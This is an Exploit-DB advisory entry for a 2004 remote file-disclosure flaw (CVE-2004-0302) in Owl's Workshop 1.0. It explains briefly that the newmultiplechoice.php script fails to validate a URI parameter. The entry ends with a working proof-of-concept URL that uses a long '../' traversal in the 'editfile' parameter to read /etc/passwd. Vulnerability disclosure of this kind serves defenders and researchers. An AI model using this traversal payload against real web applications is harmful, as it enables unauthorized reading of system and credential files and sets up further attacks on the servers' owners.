Fool's Workshop Owl's Workshop 1.0 newmultiplechoice.php Arbitrary File Access

2004-02-18T00:00:00
ID EDB-ID:23724
Type exploitdb
Reporter G00db0y
Modified 2004-02-18T00:00:00

Description

Fool's Workshop Owl's Workshop 1.0 newmultiplechoice.php Arbitrary File Access&. CVE-2004-0302. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/9689/info
  
Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter.
  
Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.

http://www.example.org/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd